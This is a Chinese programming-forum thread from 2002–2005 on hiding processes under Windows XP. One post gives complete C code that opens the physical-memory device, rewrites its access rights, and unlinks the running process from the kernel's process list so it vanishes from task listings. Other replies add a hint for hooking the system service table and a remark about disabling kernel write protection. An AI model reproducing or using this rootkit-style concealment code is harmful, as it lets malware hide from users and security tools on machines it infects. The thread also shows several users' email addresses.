|
阅读:5221回复:25
xp系统下,进程隐藏问题
我们知道,在Windows 2000下,可以通过hook一个Native api,即ZwQuerySystemInformation函数来达到进程隐藏的目的。我现在在Windows 2k下,能够很好的隐藏进程,但是发现在xp下,不能正常工作。
据我所知,xp也是使用nt内核,我觉得该方法应该可以在xp下使用,但是如何修改了,希望斑竹能够给我指点迷津。 |
|
最新喜欢: Zhouy
|
|
沙发#
发布于:2005-03-10 22:01
我在XP下实现过 和2K是一样的 只是在HOOK的时候要暂时去掉内存保护 就是更改有个寄存器的某一位 否则会蓝屏 具体怎么做,我记不得了 |
|
|
|
板凳#
发布于:2005-03-09 16:59
正在研究这方面,期待高手的指点迷津~
|
|
|
地板#
发布于:2005-02-22 10:22
这段代码是在xp下隐藏自身,怎么改一下可以隐藏别的进程?高手指点。
#include<windows.h> #include<Accctrl.h> #include<Aclapi.h> #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L) typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK { NTSTATUS Status; ULONG Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; #define OBJ_INHERIT 0x00000002L #define OBJ_PERMANENT 0x00000010L #define OBJ_EXCLUSIVE 0x00000020L #define OBJ_CASE_INSENSITIVE 0x00000040L #define OBJ_OPENIF 0x00000080L #define OBJ_OPENLINK 0x00000100L #define OBJ_KERNEL_HANDLE 0x00000200L #define OBJ_VALID_ATTRIBUTES 0x000003F2L typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes ); typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString ); RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; BOOL InitNTDLL() { g_hNtDLL = LoadLibrary( \"ntdll.dll\" ); if ( !g_hNtDLL ) { return FALSE; } RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, \"RtlInitUnicodeString\"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, \"ZwOpenSection\"); return TRUE; } VOID CloseNTDLL() { if(g_hNtDLL != NULL) { FreeLibrary(g_hNtDLL); } } VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) { PACL pDacl=NULL; PACL pNewDacl=NULL; PSECURITY_DESCRIPTOR pSD=NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS) { goto CleanUp; } ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = \"CURRENT_USER\"; if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS) { goto CleanUp; } if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS) { goto CleanUp; } CleanUp: if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } HANDLE OpenPhysicalMemory() { NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; RtlInitUnicodeString( &physmemString, L\"\\\\Device\\\\PhysicalMemory\" ); attributes.Length = sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = &physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); if(status == STATUS_ACCESS_DENIED){ status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); } if( !NT_SUCCESS( status )) { return NULL; } g_pMapPhysicalMemory = MapViewOfFile( g_hMPM, 4, 0, 0x30000, 0x1000); if( g_pMapPhysicalMemory == NULL ) { return NULL; } return g_hMPM; } PVOID LinearToPhys(PULONG BaseAddress,PVOID addr) { ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr; PGDE=BaseAddress[VAddr>>22]; if ((PGDE&1)!=0) { ULONG tmp=PGDE&0x00000080; if (tmp!=0) { PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF); } else { PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if ((PTE&1)!=0) { PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); } else return 0; } } else return 0; return (PVOID)PAddr; } ULONG GetData(PVOID addr) { ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000); if (tmp==0) return 0; ULONG ret=tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp); return ret; } BOOL SetData(PVOID addr,ULONG data) { ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp==0) return FALSE; tmp[(phys & 0xFFF)>>2]=data; UnmapViewOfFile(tmp); return TRUE; } BOOL HideProcessAtAll() { if (InitNTDLL()) { if (OpenPhysicalMemory()==0) { return FALSE; } ULONG thread=GetData((PVOID)0xFFDFF124); ULONG process=GetData(PVOID(thread+0x22c)); ULONG fw=GetData(PVOID(process+0x88)),bw=GetData(PVOID(process+0x8c)); SetData(PVOID(fw+4),bw); SetData(PVOID(bw),fw); UnmapViewOfFile(g_pMapPhysicalMemory); CloseHandle(g_hMPM); CloseNTDLL(); } return TRUE; } int main() { HideProcessAtAll(); return 0; } |
|
|
地下室#
发布于:2005-01-07 23:52
给大家一个公用版本! 执行后结果如下: 好象是有问题喔 |
|
|
|
5楼#
发布于:2005-01-07 15:43
用户被禁言,该主题自动屏蔽! |
|
|
6楼#
发布于:2005-01-03 19:05
好功能
程序员必学 |
|
|
7楼#
发布于:2005-01-01 10:50
偶也想要一个研究,可以吗:)?
hongsing@163.com |
|
|
8楼#
发布于:2004-12-31 23:59
我也碰到这个问题,能给我发一个吗?
poenir@sohu.com |
|
|
9楼#
发布于:2004-12-10 10:19
顶!
|
|
|
10楼#
发布于:2004-12-09 09:56
XP下实现了么?我也遇到这个问题,帮帮忙啊!
|
|
|
11楼#
发布于:2003-06-19 09:59
你的问题估计是XP的服务号和2K的不对,应该改成OldZwQuerySystemInformation = (PZwQuerySystemInformation)(*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0xAD));
|
|
|
12楼#
发布于:2003-02-16 14:08
我自己都没了呢,5555
|
|
|
|
13楼#
发布于:2003-02-16 12:52
哪位大虾可以把2000下的实现代码贴出来,或者发给我,谢谢
smhp@163.net |
|
|
14楼#
发布于:2002-11-09 22:11
[quote]请查看email,我用163发的,不知道要躲久 收到,谢谢。 如果你缺分,我可以开帖子给你分。 [/quote] 花猫大侠,能把这份代码给我邮一份吗? 我的EMAIL: horsedo@sina.com 如果你缺分,我也可以开帖子给你分 :D |
|
|
15楼#
发布于:2002-10-14 11:15
现在还不缺,等缺的时候在抱着你的脚 不错,9X下hook了ToolHelp32,给我一些启发,启发……………… 呵呵,再次谢谢你。 |
|
|
|
16楼#
发布于:2002-10-14 11:10
现在还不缺,等缺的时候在抱着你的脚
|
|
|
|
17楼#
发布于:2002-10-14 11:08
请查看email,我用163发的,不知道要躲久 收到,谢谢。 如果你缺分,我可以开帖子给你分。 |
|
|
|
18楼#
发布于:2002-10-14 11:04
请查看email,我用163发的,不知道要躲久
|
|
|
|
19楼#
发布于:2002-10-14 11:00
怎么给你? 发到我签名里的信箱 cvcmaster@etang.com 我也不喜欢9X,但我希望我的东西在所有Win32平台上都能跑。 你是说9X下用那个RegisterXXXX?那个似乎只能在任务列表里隐藏,但据说用别的进程查看,还是能看到,但我没实验过。 |
|
|
上一页
下一页